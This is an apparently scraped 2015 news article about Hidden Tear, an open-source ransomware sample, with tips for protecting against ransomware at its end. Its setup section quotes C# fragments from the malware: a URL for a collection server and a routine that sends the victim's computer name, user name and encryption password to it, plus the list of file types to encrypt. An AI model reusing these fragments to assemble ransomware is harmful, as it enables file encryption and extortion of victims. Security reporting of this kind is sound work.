Script Kiddies Can Now Create Their Own Ransomware Using This Kit

Resources
  • Webinars
  • Awards
  • Free eBooks
About Site
  • About THN
  • Jobs
  • Advertise with us
Contact/Tip Us Reach out to get featured—contact us to send your exclusive story idea, research, hacks, or ask us a question or leave a comment/feedback! Follow Us On Social Media RSS Feeds Email Alerts Security Service Edge Script Kiddies can Now Create their Own Ransomware using This Kit Khyati JainAug 19, 2015 Ransomware-creator-toolkit Don't panic! You heard it right. A Turkish security researcher named Utku Sen has posted a fully functional Ransomware code on open source code sharing website GitHub. The Ransomware dubbed Hidden Tear, uses AES Encryption to lock down files before displaying a ransom message warning to get users to pay up. The currently undetectable version of ransomware can be modified and implemented accordingly, as it contains every feature a cybercriminal can expect from modern malware. Sen describes his Ransomware as "a ransomware-like file crypter sample which can be modified for specific purposes." This means even script kiddies can now develop their own Ransomware to threaten people.

The Hidden Tear — Free Ransomware Kit

The "Hidden Tear" Ransomware package consists of four files namely:
  • Hidden-Tear-Decrypter
  • Hidden-Tear
  • .gitignore
  • README.md
Hidden Tear Ransomware is capable of:
  • Using AES algorithm to encrypt files
  • Sending encryption key to a server
  • Encrypting files and decrypting them using a decrypter program with the encryption key
  • Creating a text file in Desktop with given message
  • Small file size (12 KB)
  • Evading detection by all standard anti-virus programs

How to Setup your Custom Ransomware Using Hidden Tear?

Sen has specified usage details as well, he says: 1. You need to have a web server that supports scripting languages such as PHP or Python. Then change the below-mentioned line with your URL. (Better use HTTPS connection in order to avoid eavesdropping): string targetURL = "https://www.example.com/hidden-tear/write.php?info="; 2. The script should write the GET parameter to a text file. Sending process running in SendPassword() function: string info = computerName + "-" + userName + " " + password; var fullUrl = targetURL + info; var conent = new System.Net.WebClient().DownloadString(fullUrl); 3. Target file extensions can also be change. Default list: var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};

For Educational Purpose... REALLY!

Wait! Sen has something more to say, listening to which you might think...REALLY!! With the whole project "Hidden Tear," there's an attached legal warning that says:
"While this may be helpful for some, there are significant risks. The 'Hidden Tear' may be used only for 'Educational Purposes.' Do not use it as a Ransomware! You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent."
Somebody should ask him… Why instigating people to commit a crime? One could imagine such "Educational Purposes" as there's a big chance of Ransomware to pop up in recent attacks. A visit to the Video Demonstration of the sandbox testing of 'Hidden Tear' will give a real picture of what all it is capable of doing.

How to Protect Yourself from Ransomware Threat?

Two months ago, we introduced you a Free Ransomware Decryption and Malware Removal ToolKit that could help you deal with various variants of ransomware as well as help you unlock encrypted files without paying off to the cyber crooks. However, there are some important steps that should be considered to protect yourself from Ransomware threats.
  • Always keep regular backups of your important data.
  • Make sure you run an active anti-virus security suite of tools on your system.
  • Do not open email attachments from unknown sources.
  • Most importantly, always browse the Internet safely.
To keep yourself safe, we also have an excellent article on How to protect your computer from ransomware malware? Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post. SHARE Tweet Share Share Share Share on Facebook Share on Twitter Share on Linkedin Share on Reddit Share on Hacker News Share on Email Share on WhatsApp Facebook MessengerShare on Facebook Messenger Share on Telegram SHARE decrypt ransomware, Hidden Tear Ransomware, ransomware, Ransomware Kit, ransomware removal tool Trending News
Researchers Show Copilot and Grok Can Be Abused as Malware C2 Proxies
Researchers Show Copilot and Grok Can Be Abused as Malware C2 Proxies
⚡ Weekly Recap: Double-Tap Skimmers, PromptSpy AI, 30Tbps DDoS, Docker Malware and More
⚡ Weekly Recap: Double-Tap Skimmers, PromptSpy AI, 30Tbps DDoS, Docker Malware and More
ThreatsDay Bulletin: Kali Linux + Claude, Chrome Crash Traps, WinRAR Flaws, LockBit and 15+ Stories
ThreatsDay Bulletin: Kali Linux + Claude, Chrome Crash Traps, WinRAR Flaws, LockBit and 15+ Stories
Cisco SD-WAN Zero-Day CVE-2026-20127 Exploited Since 2023 for Admin Access
Cisco SD-WAN Zero-Day CVE-2026-20127 Exploited Since 2023 for Admin Access
Claude Code Flaws Allow Remote Code Execution and API Key Exfiltration
Claude Code Flaws Allow Remote Code Execution and API Key Exfiltration
Anthropic Says Chinese AI Firms Used 16 Million Claude Queries to Copy Model
Anthropic Says Chinese AI Firms Used 16 Million Claude Queries to Copy Model
Anthropic Launches Claude Code Security for AI-Powered Vulnerability Scanning
Anthropic Launches Claude Code Security for AI-Powered Vulnerability Scanning
AI-Assisted Threat Actor Compromises 600+ FortiGate Devices in 55 Countries
AI-Assisted Threat Actor Compromises 600+ FortiGate Devices in 55 Countries
ClickFix Campaign Abuses Compromised Sites to Deploy MIMICRAT Malware
ClickFix Campaign Abuses Compromised Sites to Deploy MIMICRAT Malware
Cline CLI 2.3.0 Supply Chain Attack Installed OpenClaw on Developer Systems
Cline CLI 2.3.0 Supply Chain Attack Installed OpenClaw on Developer Systems
PromptSpy Android Malware Abuses Gemini AI to Automate Recent-Apps Persistence
PromptSpy Android Malware Abuses Gemini AI to Automate Recent-Apps Persistence
Notepad++ Fixes Hijacked Update Mechanism Used to Deliver Targeted Malware
Notepad++ Fixes Hijacked Update Mechanism Used to Deliver Targeted Malware
Dell RecoverPoint for VMs Zero-Day CVE-2026-22769 Exploited Since Mid-2024
Dell RecoverPoint for VMs Zero-Day CVE-2026-22769 Exploited Since Mid-2024
Citizen Lab Finds Cellebrite Tool Used on Kenyan Activist’s Phone in Police Custody
Citizen Lab Finds Cellebrite Tool Used on Kenyan Activist’s Phone in Police Custody
Identity Prioritization isn't a Backlog Problem - It's a Risk Math Problem
Identity Prioritization isn't a Backlog Problem - It's a Risk Math Problem
How Exposed Endpoints Increase Risk Across LLM Infrastructure
How Exposed Endpoints Increase Risk Across LLM Infrastructure Popular Resources
Articles
100+ Domains Multiply Attack Risk 6× - Download the CTEM Divide Research
Articles
Boost SOC Efficiency with AI-Guided Triage — Download Investigator Overview
Articles
Silent Residency Is the New Threat Model — Download the Red Report
Articles
Exposed Cloud Training Apps Are Letting Hackers In — Download the Research

Cybersecurity Webinars

Hidden Attack Paths You’re Missing

Learn to Find Hidden Vulnerabilities in Autonomous AI Agents

A practical deep dive into securing AI agents against real-world attack paths beyond the model itself.

Register Inside the Quantum Threat

Learn Quantum-Safe Practices to Stop Future Decrypt Attacks

Quantum computers could soon break today’s encryption—join Zscaler’s webinar to learn how post-quantum cryptography keeps your data safe for the future.

Register Latest News Cybersecurity Resources CybersecurityZero Trust + AI: Thrive in the AI Era and Remain ResilientZero Trust Everywhere - protection across your workforce, branches, and clouds, and GenAI.. CybersecurityStop AI-Powered Threats and Protect Sensitive Data with Zscaler Zero Trust + AICompanies must replace legacy firewalls, VPNs, and exposed IPs with a Zero Trust + AI security model to protect AI usage and stop AI-driven attacks. CybersecurityEarn a Master's in Cybersecurity Risk ManagementLead the future of cybersecurity risk management with an online Master’s from Georgetown. ​ Expert Insights Articles Videos Expert Insights

AI SOC Investigation Has Moved Beyond Triage: Two Cases That Show Where It Actually Matters

March 2, 2026 Read ➝ Expert Insights

AI in Cybersecurity: Is It Worth the Effort for Lean Security Teams?

March 2, 2026 Read ➝ Expert Insights

Demystifying Key Exchange: From Classical Elliptic Curve Cryptography to a Post-Quantum Future

March 2, 2026 Read ➝ Expert Insights

AI Won't Break Microsoft 365. Your Security Backlog Will

February 23, 2026 Read ➝ Get Latest News in Your Inbox

Get the latest news, expert insights, exclusive resources, and strategies from industry leaders – all for free.

Email

Tag » How To Create Your Own Ransomware